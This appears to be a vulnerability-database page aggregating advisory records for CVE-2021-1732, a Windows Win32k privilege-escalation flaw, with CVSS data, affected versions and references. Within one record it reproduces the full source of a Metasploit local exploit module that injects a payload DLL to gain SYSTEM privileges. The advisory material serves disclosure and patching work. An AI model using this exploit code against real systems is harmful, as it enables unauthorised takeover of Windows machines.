              "matchCriteriaId": "DB79EE26-FC32-417D-A49C-A1A63165A968",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_20h2:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "84F9B6B1-4FEE-4D4B-B35F-B07822CCD669",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Windows Win32k Elevation of Privilege Vulnerability"
    },
    {
      "lang": "es",
      "value": "Una Vulnerabilidad de Elevaci\u00f3n de Privilegios de Win32k de Windows. Este ID de CVE es diferente de CVE-2021-1698"
    }
  ],
  "id": "CVE-2021-1732",
  "lastModified": "2025-02-11T16:58:39.687",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.6,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "secure@microsoft.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Secondary"
      }
    ]
  },
  "published": "2021-02-25T23:15:13.930",
  "references": [
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
    }
  ],
  "sourceIdentifier": "secure@microsoft.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-787"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-787"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

gsd-2021-1732

Vulnerability from gsd

Modified

2023-12-13 01:23

Details

Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.

Aliases

CVE-2021-1732

Aliases

CVE-2021-1732

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-1732",
    "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.",
    "id": "GSD-2021-1732",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2021-1732"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-1732"
      ],
      "details": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.",
      "id": "GSD-2021-1732",
      "modified": "2023-12-13T01:23:21.909561Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cisa.gov": {
      "cveID": "CVE-2021-1732",
      "dateAdded": "2021-11-03",
      "dueDate": "2021-11-17",
      "product": "Win32k",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "Windows Win32k Privilege Escalation Vulnerability. This CVE ID is unique from CVE-2021-1698.",
      "vendorProject": "Microsoft",
      "vulnerabilityName": "Microsoft Win32k Privilege Escalation Vulnerability"
    },
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "secure@microsoft.com",
        "ID": "CVE-2021-1732",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Windows 10 Version 1803",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows 10 Version 1809",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows Server 2019",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows Server 2019 (Server Core installation)",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows 10 Version 1909",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows Server, version 1909 (Server Core installation)",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows 10 Version 2004",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows Server version 2004",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows 10 Version 20H2",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Windows Server version 20H2",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "10.0.0",
                          "version_value": "publication"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Microsoft"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Windows Win32k Elevation of Privilege Vulnerability"
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Elevation of Privilege"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732",
            "refsource": "MISC",
            "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
          },
          {
            "name": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
          },
          {
            "name": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "cisaActionDue": "2021-11-17",
        "cisaExploitAdd": "2021-11-03",
        "cisaRequiredAction": "Apply updates per vendor instructions.",
        "cisaVulnerabilityName": "Microsoft Win32k Privilege Escalation Vulnerability",
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*",
                    "matchCriteriaId": "9E2C378B-1507-4C81-82F6-9F599616845A",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*",
                    "matchCriteriaId": "7CB85C75-4D35-480E-843D-60579EC75FCB",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*",
                    "matchCriteriaId": "6B8F3DD2-A145-4AF1-8545-CC42892DA3D1",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*",
                    "matchCriteriaId": "E9273B95-20ED-4547-B0A8-95AD15B30372",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*",
                    "matchCriteriaId": "AAE74AF3-C559-4645-A6C0-25C3D647AAC8",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*",
                    "matchCriteriaId": "4A190388-AA82-4504-9D5A-624F23268C9F",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*",
                    "matchCriteriaId": "C253A63F-03AB-41CB-A03A-B2674DEA98AA",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*",
                    "matchCriteriaId": "0B60D940-80C7-49F0-8F4E-3F99AC15FA82",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
                    "matchCriteriaId": "DB79EE26-FC32-417D-A49C-A1A63165A968",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ]
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "Windows Win32k Elevation of Privilege Vulnerability"
          },
          {
            "lang": "es",
            "value": "Una Vulnerabilidad de Elevaci\u00f3n de Privilegios de Win32k de Windows. Este ID de CVE es diferente de CVE-2021-1698"
          }
        ],
        "id": "CVE-2021-1732",
        "lastModified": "2023-12-29T23:15:26.480",
        "metrics": {
          "cvssMetricV2": [
            {
              "acInsufInfo": false,
              "baseSeverity": "MEDIUM",
              "cvssData": {
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "availabilityImpact": "PARTIAL",
                "baseScore": 4.6,
                "confidentialityImpact": "PARTIAL",
                "integrityImpact": "PARTIAL",
                "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 6.4,
              "obtainAllPrivilege": false,
              "obtainOtherPrivilege": false,
              "obtainUserPrivilege": false,
              "source": "nvd@nist.gov",
              "type": "Primary",
              "userInteractionRequired": false
            }
          ],
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 1.8,
              "impactScore": 5.9,
              "source": "secure@microsoft.com",
              "type": "Primary"
            },
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 1.8,
              "impactScore": 5.9,
              "source": "nvd@nist.gov",
              "type": "Secondary"
            }
          ]
        },
        "published": "2021-02-25T23:15:13.930",
        "references": [
          {
            "source": "secure@microsoft.com",
            "tags": [
              "Exploit",
              "Third Party Advisory",
              "VDB Entry"
            ],
            "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
          },
          {
            "source": "secure@microsoft.com",
            "tags": [
              "Exploit",
              "Third Party Advisory",
              "VDB Entry"
            ],
            "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
          },
          {
            "source": "secure@microsoft.com",
            "tags": [
              "Patch",
              "Vendor Advisory"
            ],
            "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
          }
        ],
        "sourceIdentifier": "secure@microsoft.com",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-787"
              }
            ],
            "source": "nvd@nist.gov",
            "type": "Primary"
          }
        ]
      }
    }
  }
}

ghsa-gvwr-5hrc-2gr5

Vulnerability from github

Published

2022-05-24 17:43

Modified

2022-05-24 17:43

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Details

Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2021-1732"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-02-25T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.",
  "id": "GHSA-gvwr-5hrc-2gr5",
  "modified": "2022-05-24T17:43:11Z",
  "published": "2022-05-24T17:43:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1732"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

var-202102-0786

Vulnerability from variot

Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k是美国微软（Microsoft）公司的一个用于Windows多用户管理的系统文件. Microsoft Win32k 中存在安全特征问题漏洞。以下产品及版本受到影响：Windows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ##

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking

include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck

include Msf::Exploit::Deprecated moved_from 'exploit/windows/local/cve_2021_1732_win32k'

def initialize(info = {}) super( update_info( info, { 'Name' => 'Win32k ConsoleControl Offset Confusion', 'Description' => %q{ A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation.

        This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. 
        In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
        is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
        function on a wider range of Windows 10 targets. 
      },
      'License' => MSF_LICENSE,
      'Author' => [
        # CVE-2021-1732
        'BITTER APT', # exploit as used in the wild
        'JinQuan', # detailed analysis
        'MaDongZe', # detailed analysis
        'TuXiaoYi', # detailed analysis
        'LiHao', # detailed analysis
        # CVE-2022-21882
        'L4ys', # github poc
        # both CVEs
        'KaLendsi', # github pocs
        # Metasploit exploit
        'Spencer McIntyre' # metasploit module
      ],
      'Arch' => [ ARCH_X64 ],
      'Platform' => 'win',
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      'Targets' => [
        [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
      ],
      'Payload' => {
        'DisableNops' => true
      },
      'References' => [
        # CVE-2021-1732 references
        [ 'CVE', '2021-1732' ],
        [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
        [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
        [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
        [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
        # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
        [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
        [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
        [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
        [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
        # CVE-2022-21882 references
        [ 'CVE', '2022-21882' ],
        [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
        [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
      ],
      'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [ CRASH_OS_RESTARTS, ],
        'Reliability' => [ REPEATABLE_SESSION, ],
        'SideEffects' => []
      }
    }
  )
)

end

def check sysinfo_value = sysinfo['OS']

if sysinfo_value !~ /windows/i
  # Non-Windows systems are definitely not affected. 
  return Exploit::CheckCode::Safe
end

build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")

unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
  print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
  return CheckCode::Safe
end

CheckCode::Appears

end

def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end

if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
  fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
  fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
  fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end

encoded_payload = payload.encoded
execute_dll(
  ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
  [encoded_payload.length].pack('I<') + encoded_payload
)

print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')

end end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202102-0786",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "windows 10 1909",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 10 1809",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server 2019",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 10 1803",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server 2004",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 10 20h2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server 20h2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 10 2004",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server 1909",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-1732"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Spencer McIntyre",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-670"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-1732",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-1732",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
